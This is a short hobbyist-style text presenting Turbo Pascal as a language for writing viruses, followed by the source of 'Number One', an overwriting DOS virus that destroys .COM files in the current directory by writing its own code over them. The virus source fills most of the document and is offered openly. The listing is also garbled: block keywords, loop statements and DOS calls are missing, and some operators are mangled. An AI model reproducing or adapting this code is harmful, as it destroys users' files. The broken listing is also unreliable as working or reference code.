Number One

Pascal is another high level language that can produce eye popping computer viruses. Especially when the usage of Turbo Pascal is involved.
The virus below was available through various bulletin boards for a while.
Although this is a primitive virus its effective.
In this virus only the .COM files are infected. Its about 12K and it will change the date entry.

{Number One} 
{ Number One infects all .COM - file's name will be displayed         } 
{ That file has been overwritten with Number Ones's program code and  } 
{ is not reconstructible! If all files are infected or or no .COM     } 
{ files are found, Number one gives you a <smile.                    } 
{ Files may be protected against infections of Number One by          } 
{ setting the Read ONLY attribute.                                    } 
{ Written 10.3.87 by M.Vallen (Turbo Pascal 3.01A) - edited by ???    } 
{I-}       { Wont allow a user break, enable IO check } 
{ -- Constants --------------------------------------- } 
     VirusSize = 12027;    { Number One's code size } 
     Warning   :String[42]     { Warning message } 
     = 'This File Has Been Infected by Number One!'; 
{ -- Type declarations------------------------------------- } 
     DTARec    =Record      { Data area for file search } 
     DOSnext  :Array[1..21] of Byte; 
                   Attr    : Byte; 
                   FHsize  : Integer; 
                   FullName: Array[1..13] of Char; 
Registers    = Record    {Register set used for file search } 
   Case Byte of 
   1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); 
   2 : (AL,AH,BL,BH,CL,CH,DL,DH          : Byte); 
{ -- Variables--------------------------------------------- } 
                               { Memory offset program code } 
   ProgramStart : Byte absolute Cseg:$100; 
                                          { Infected marker } 
   MarkInfected : String[42] absolute Cseg:$180; 
   Reg          : Registers;                 { Register set } 
   DTA          : DTARec;                       { Data area } 
   Buffer       : Array[Byte] of Byte;        { Data buffer } 
   TestID       : String[42]; { To recognize infected files } 
   UsePath      : String[66];        { Path to search files } 
                                    { Lenght of search path } 
   UsePathLenght: Byte absolute UsePath; 
   Go           : File;                    { File to infect } 
   B            : Byte;                              { Used } 
{ -- Program code------------------------------------------ } 
  WriteLn(Warning);               { Display warning message } 
  GetDir(0, UsePath);               { get current directory } 
  if Pos('\', UsePath) < UsePathLenght then 
    UsePath := UsePath + '\'; 
  UsePath := UsePath + '*.COM';        { Define search mask } 
  Reg.AH := $1A;                            { Set data area } 
  Reg.DS := Seg(DTA); 
  Reg.DX := Ofs(DTA); 
  UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } 
  Reg.AH := $4E; 
  Reg.DS := Seg(UsePath); 
  Reg.DX := Ofs(UsePath[1]); 
  Reg.CX := $ff;          { Set attribute to find ALL files } 
  MsDos(Reg);                   { Find first matching entry } 
  IF not Odd(Reg.Flags) Then         { If a file found then } 
      UsePath := DTA.FullName; 
      B := Pos(#0, UsePath); 
      If B 0 then 
      Delete(UsePath, B, 255);             { Remove garbage } 
      Assign(Go, UsePath); 
      If IOresult = 0 Then          { If not IO error then } 
        BlockRead(Go, Buffer, 2); 
        Move(Buffer[$80], TestID, 43); 
                      { Test if file already ill(Infected) } 
        If TestID < Warning Then        { If not then ... } 
          Seek (Go, 0); 
                            { Mark file as infected and .. } 
          MarkInfected := Warning; 
                                               { Infect it } 
          BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); 
                                  { Say what has been done } 
          WriteLn(UsePath + 'infected.'); 
          Halt;                   {.. and halt the program } 
        { The file has already been infected, search next. } 
      Reg.AH := $4F; 
      Reg.DS := Seg(DTA); 
      Reg.DX := Ofs(DTA); 
    {  ......................Until no more files are found } 
    Until Odd(Reg.Flags); 
  Write('<Smile');                          {Give a smile } 